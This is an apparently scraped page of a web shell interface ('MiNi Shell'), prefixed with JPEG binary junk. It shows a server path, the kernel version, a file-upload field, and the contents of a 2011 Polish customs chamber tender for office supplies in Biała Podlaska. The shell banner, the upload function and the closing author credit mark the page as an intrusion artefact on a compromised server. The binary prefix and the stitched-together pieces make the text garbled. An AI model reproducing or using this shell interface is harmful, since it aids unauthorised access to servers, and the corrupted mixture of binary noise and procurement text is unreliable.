JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110406/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110406/66518-N-2011.html

<p class="kh_header"><b>Biała Podlaska: Dostawa artykułów biurowych</b><br>
<b>Numer ogłoszenia: 66518 - 2011; data zamieszczenia: 06.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Izba Celna w Białej Podlaskiej , ul. Północna 19, 21-500 Biała Podlaska, woj. lubelskie, tel. 83 3443223, 3449853, faks 83 3443397.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialapodlaska.uc.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów biurowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest sprzedaż wraz z dostawą, w okresie od dnia podpisania umowy do dnia 31 grudnia 2011 r., lub do wykorzystania kwoty na jaką zostanie zawarta umowa, transportem i na koszt Wykonawcy artykułów biurowych, łącznie z wniesieniem do magazynu Zamawiającego mieszczącego się w siedzibie Izby Celnej w Białej Podlaskiej przy ul. Celników Polskich 21.
2.	Zakres asortymentowy przedmiotu zamówienia wraz z podaniem poszczególnych ilości określony został w poniższej tabeli:
Lp.	Nazwa towaru	Zapotrzebowanie	Jednostka miary
1	Brulion A4 - 96 kk, oprawa twarda.	288	szt.
2	Brulion A4 -192 kk, oprawa twarda.	45	szt.
3	Brulion A5 - 96 kk, oprawa twarda.	18	szt.
4	Długopis z możliwością wymiany wkładu. Kolor niebieski.	4000	szt.
5	Etykieta A-4 samoprzylepna, biała. Opakowanie = 100 arkuszy.	1	op.
6	Etykieta, folia termotransferowa 50x30 mm nawinięta na gilzie. Średnica zewnętrzna maksymalnie 120 mm.	2	szt.
7	Grzbiety do bindowania 10mm A4 - do max 65kartek.	40	szt.
8	Grzbiety do bindowania 14mm A4 - do max 122 kartek.	140	szt.
9	Grzbiety wsuwane A4.	145	szt.
10	Gumka do ścierania.	571	szt.
11	Gumka recepturka.	33	kg
12	Karteczki indeksujące samoklejące wym. 20x50mm, różne kolory.	50	szt.
13	Klej biurowy w tubie poj. 40 ml.	1000	szt.
14	Klej butapren w tubie poj. 40 ml.	38	szt.
15	Klips aktowy (archiwizacyjny).	8180	szt.
16	Klips biurowy 32 mm - op. 12 szt.	146	op.
17	Koperta B4 250x353 mm, biała, samoklejąca.	15770	szt.
18	Koperta B4 250x353x40mm, biała, rozszerzana, samoklejąca.	22005	szt.
19	Koperta zaklejana na mokro C5 NK biała, wym. 162x229 mm, bez okienka.	39360	szt.
20	Koperta C6 NK biała, wym. 114x162 mm, bez okienka.	59152	szt.
21	Koperta C6 NK biała, wym. 114x162 mm z okienkiem prawy dół.	2750	szt.
22	Koperta CD na płyty.	220	szt.
23	Koperta DL biała, wym. 110x220 bez okienka, samoklejąca.	200	szt.
24	Koperta DL z okienkiem prawy dół  110x220, samoklejąca.	12580	szt.
25	Korektor pisak.	180	szt.
26	Korektor taśma.	100	szt.
27	Koszulka krystaliczna A4. Opakowanie =100szt.	553	op.
28	Linijka 40 cm.	10	szt.
29	Marker wodoodporny czarny.	800	szt.
30	Marker do tablicy magnetycznej.	22	szt.
31	Marker do znakowania CD/DVD.	388	szt.
32	Marker permanentny. Końcówka 1mm.	2	szt.
33	Marker permanentny. Końcówka 3mm.	2	szt.
34	Masa czyszcząca stemple metalowe.	86	szt.
35	Mata biurowa pod stemple formatu A4.	51	szt.
36	Okładki bezbarwne do bindowania A4.	339	szt.
37	Okładki kolorowe do bindowania A4.	339	szt.
38	Okładki (obwoluty) na wydruki komputerowe A4.Typ L - otwarta na górze i wzdłuż brzegu	31	szt.
39	Ołówek z gumką.	500	szt.
40	Papier termiczny do faxu szer. 210mm/dł.30m.	56	rolka.
41	Papier komputerowy składanka komputerowa 240x12(1+2) Opakowanie = 600 składek w kartonie.	1	szt.
42	Papier ozdobny. W jednolitym kolorze.	50	arkusz.
43	Papier fotograficzny. Format: 13x18. Wykończenie: Glossy, Gramatura: min. 225 g. Opakowanie=50 arkuszy.	1	op.
44	Pinezki tablicowe kolorowe. Opakowanie = 100 szt.	300	op.
45	Podkładka (deska) do papieru z klipem.	139	szt.
46	Podkładka gumowa do stempli A-5.	59	szt.
47	Poduszka do stempli metalowych, sucha, średnica 14 cm.	200	szt.
48	Płyn do zmywania tablic sucho ścieralnych.	9	szt.
49	Segregator A4/50.Wykonany z twardej tektury pokrytej jednostronnie okleiną PCV.	525	szt.
50	Segregator A4/70.Wykonany z twardej tektury pokrytej jednostronnie okleiną PCV.	12318	szt.
51	Segregator na 26 płyt CD.	2	szt.
52	Skoroszyt A4 plastikowy.	2808	szt.
53	Skoroszyt papierowy z zawieszką.	3935	szt.
54	Spinacz krzyżowy 70 mm-opakowanie 12 szt.	128	op.
55	Spinacz R 50 plikowy 1 op.=100szt.	7944	op.
56	Spinacz R28 biurowy 1op.=100szt.	20074	op.
57	Szufladka na dokumenty.	306	szt.
58	Tablica flipchart 65x100 cm na regulowanym trójnogu, powierzchnia posiadające właściwości magnetyczne, przystosowana do pisania pisakami sucho ścieralnymi.	2	szt.
59	Taśma dwustronna. Rozmiar 50mm/10m.	89	szt.
60	Taśma klejąca  bezbarwna. Rozmiar 24 mm/ 20m.	17210	szt.
61	Taśma malarska wąska.	5	szt.
62	Teczka do podpisu oprawa twarda, harmonijka, 10 przekładek.	40	szt.
63	Teczka papierowa, skrzydłowa z gumka. Rozmiar A4.	198	szt.
64	Teczka papierowa, wiązana, biała. Rozmiar A4.	2322	szt.
65	Teczka wiązana plastikowa. Rozmiar A4.	400	szt.
66	Teczka z gumką, papierowa. Rozmiar A4.	420	szt.
67	Teczka z rączką, papierowa. Rozmiar A4. Jednolity kolor.	41	szt.
68	Temperówka metalowa.	273	szt.
69	Tusz do stempli kauczukowych.
Opakowanie 22-25 ml.
(zielony = 200 szt.)
(czerwony = 81 szt.)	281	szt.
70	Tusz do stempli metalowych, czarny.
Opakowanie 22-25 ml.	94	szt.
71	Wąsy do skoroszytów - Opakowanie 250 szt.	10	op.
72	Wkład do długopisu. Odpowiedni do długopisów z pozycji 4 zestawienia. Kolor niebieski.	1000	szt.
73	Zeszyt A5 60kk. Oprawa miękka.	72	szt.
74	zeszyt A4 80 kk. Oprawa miękka.	145	szt.
75	Zszywki 23/10. Opakowanie = 1000 szt.	447	op.
76	zszywki 23/6. Opakowanie = 1000 szt.	377	op.
77	Zszywki 23/8. Opakowanie = 1000 szt.	266	op.
78	Zszywki24/6. Opakowanie = 1000 szt.	5077	op.
79	Zszywki23/13. Opakowanie = 1000 szt.	98	op.
80	Zszywki23/17. Opakowanie = 1000 szt.	30	op.

3.	Podane ilości oraz wskazany asortymentowo rodzaj artykułów biurowych mają charakter ilości maksymalnych. Zamawiający zastrzega sobie prawo wykorzystania w ramach umowy jedynie takich ilości, jakie będą niezbędne do prawidłowego, nieprzerwanego funkcjonowania Zamawiającego. Wszelkie roszczenia finansowo - prawne Wykonawcy z tego tytułu są wyłączone.
4.	Realizacja zamówienia dokonywana będzie na koszt i ryzyko Wykonawcy.
5.	Opis przedmiotu zamówienia zgodny z nomenklaturą Wspólnego Słownika Zamówień 
CPV: 30.19.20.00-1 - Wyroby biurowe
30.19.93.30-2 - Papier ciągły do drukarek komputerowych.
6.	Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
7.	Zamawiający nie dopuszcza składania ofert częściowych.
8.	Zamawiający nie przewiduje możliwości zawarcia umowy ramowej.
9.	Zamawiający nie przewiduje zastosowania dynamicznego systemu zakupów.
10.	Zamawiający nie przewiduje możliwości przeprowadzenia aukcji elektronicznej.
11.	Zamawiający nie przewiduje udzielenie zamówień uzupełniających, o których mowa 
w art. 67 ust. 1 pkt 7 ustawy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.93.30-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Zamawiający dokona oceny spełniania warunku, na podstawie załączonego do oferty oświadczenia, o którym mowa w art. 44 ustawy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże się należytym wykonaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch dostaw polegających na dostawie artykułów biurowych o wartości łącznej brutto co najmniej 100.000,00 zł. (sto tysięcy). Przez wartość dostawy Zamawiający rozumie łączną wartość dostarczonych artykułów w ramach jednej umowy. Przez jedną dostawę Zamawiający rozumie sumę dostaw w ramach jednej umowy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Zamawiający dokona oceny spełniania warunku, na podstawie załączonego do oferty oświadczenia, o którym mowa w art. 44 ustawy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Zamawiający dokona oceny spełniania warunku, na podstawie załączonego do oferty oświadczenia, o którym mowa w art. 44 ustawy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Zamawiający dokona oceny spełniania warunku, na podstawie załączonego do oferty oświadczenia, o którym mowa w art. 44 ustawy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru oferty na warunkach określonych we Wzorze 
umowy - Załącznik Nr 5 do SIWZ, tj.:
Zmiany osób upoważnionych do współdziałania w ramach realizacji umowy. Każda zmiana umowy nastąpi w drodze aneksu do umowy na wniosek Zamawiającego lub Wykonawcy. Wniosek Wykonawcy winien zawierać uzasadnienie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bialapodlaska.uc.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Izba Celna w Białej Podlaskiej 
ul. Celników Polskich 21
21-500 Biała Podlaska.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2011 godzina 09:00, miejsce: Izba Celna w Białej Podlaskiej 
ul. Celników Polskich 21
21-500 Biała Podlaska
(Pok. nr 1).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> NIE DOTYCZY.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com